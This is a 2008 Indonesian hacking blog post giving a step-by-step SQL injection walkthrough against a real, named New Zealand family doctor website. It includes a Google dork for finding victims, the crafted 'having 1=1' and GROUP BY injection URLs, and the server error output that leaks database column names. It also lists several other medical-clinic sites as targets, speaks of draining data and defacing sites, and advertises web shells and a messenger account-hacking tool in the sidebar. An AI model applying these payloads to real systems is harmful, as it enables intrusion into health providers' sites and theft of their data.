Member Area
online viewers |
Totaly visited


register
register
Tools
  • UnDeepFreeze
  • Blocking Auto Run
  • Blue Ip Scanner
  • YM_Account_Hack
  • YMulti_Messenger_v8
  • Auto_Room_Message
  • Shell C99
  • Shell R57
  • Auto_Room_Message
    		•
    Massage Box


    Apabila anda mengalami kesulitan didalam blog ini, atau ingin bertanya tentang semua content yang ada di blog ini, silahkan anda mengirimkannya melalui massage box diatas. Semua pertanyaan akan saya jawab melalui email.
    viewer details
    IP

    Welcome to mister master saint system
    SQL INJECTION
    Selasa, 08 Juli 2008
    Target : http://www.familydoctor.co.nz
    Injection Target: http://www.familydoctor.co.nz/index.asp?U=conditions&A=24566


    ****************************** DESTINATION ******************************

    HUNTING : Allinurl:".nz/index.asp?"

    Setelah kita dapet korban dari embah google, dapet satu target,buka site
    target.

    Target : http://www.familydoctor.co.nz
    Injection Target: http://www.familydoctor.co.nz/index.asp?U=conditions&A=24566


    setelah target telah didapat, masukan query +having+1=1-- dibelakang url target
    setelah dimasukan akan jadi seperti ini :


    http://www.familydoctor.co.nz/index.asp?U=conditions&A=24566+having+1=1--


    setelah dimasukan akan keluar field seperti ini :


    **************************************************************** FIELD

    Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

    [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'Article.article_id' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

    /conditions.asp, line 196

    **************************************************************** FIELD

    Nah, kalo keluar field kaya gini berarti bisa di injection..!!!
    Dari data field yang keluar, masukin lagi data field + query
    Tambahin ini nih dibelakang urlnya :

    +GROUP+BY+DATA FIELD YANG DIDALEM KUTIP+having+1=1--

    jadinya kaya gini :

    http://www.familydoctor.co.nz/index.asp?U=conditions&A=24566
    +GROUP+BY+Article.article_id+having+1=1--

    setelah dimasukin query itu, keluar lagi field :


    Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

    [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'Article.template' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

    /conditions.asp, line 196

    ****************************************************************


    http://www.familydoctor.co.nz/index.asp?U=conditions&A=24566
    +GROUP+BY+Article.article_id,Article.template+having+1=1--



    Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

    [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'Article.author_id' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

    /conditions.asp, line 196



    ****************************************************************




    masukin lagi data field, hasilnya :

    http://www.familydoctor.co.nz/index.asp?U=conditions&A=24566
    +GROUP+BY+Article.article_id,Article.template,Article.author_id+having+1=1--

    keluar field :





    Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

    [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'Article.topic' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

    /conditions.asp, line 196






    ****************************************************************




    masukin lagi data field, hasilnya :

    http://www.familydoctor.co.nz/index.asp?U=conditions&A=24566
    +GROUP+BY+Article.article_id,Article.template,Article.author_id,Article.topic+having+1=1--

    keluar field :





    Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

    [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'Article.content' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

    /conditions.asp, line 196

    nah, setelah kita dapet semua field.
    field yang didapet pada site ini :


    Article.article_id

    Article.template

    Article.author_id

    Article.topic

    Article.content

    ****************************** SECTOR CLEAR ******************************

    Hasil:



    http://www.familydoctor.co.nz/index.asp?U=conditions&A=24566
    http://www.ponsonbymedical.co.nz/healthtopics.aspx?C=32074
    http://www.ranolfmedical.co.nz/healthtopics.aspx?C=32246
    http://kmc.co.nz/HealthTopics.aspx?c=661&p=7
    http://www.cshc.co.nz/healthtopics.aspx?C=32553



    cukup mudah bukan?pada sql injection ini ridak semua site bisa di deface
    adakalanya ketika kita memasukan qwery, data yang kita cari tidak bisa
    diakses, mungkin telah di blokir oleh administratornya. Ada juga yang
    data yang telah kita kuras keluar namun ketika kita ingin mengupdate
    data tersebut, sql injection tidak berfungsi. Oleh karena itu terus berjuang
    dan sabar yah juragan.

    Thanks to :
    - V3NOM
    - TUKULESTO
    - KEPARAT
    - BABAH
    - IMAM
    - BLUE SKY
    - GORONTALO DEFACER CREW
    - MANADO CODING
    - INDONESIAN CODER TEAM
    - Dan semua yang telah berbagi ilmunya kepada saya, thanks all..!!!!

    SEMUA SYSTEM YANG TELAH DIBUAT OLEH MANUSIA
    TIDAK ADA YANG TIDAK BISA DIHANCURKAN SYSTEM KEAMANANNYA

    Label:

    posted by SAINT @ 06.32  
    1 Comments:
    Posting Komentar
    << Home
     
    Owner blogs

    Name : Mister Saint
    Home : Jakarta, Indonesia
    view my complete profile
    Previous Post
    Archives
    Links
    Links
    MISTER SAINT SYSTEM
    all right reserved saint copyright 2008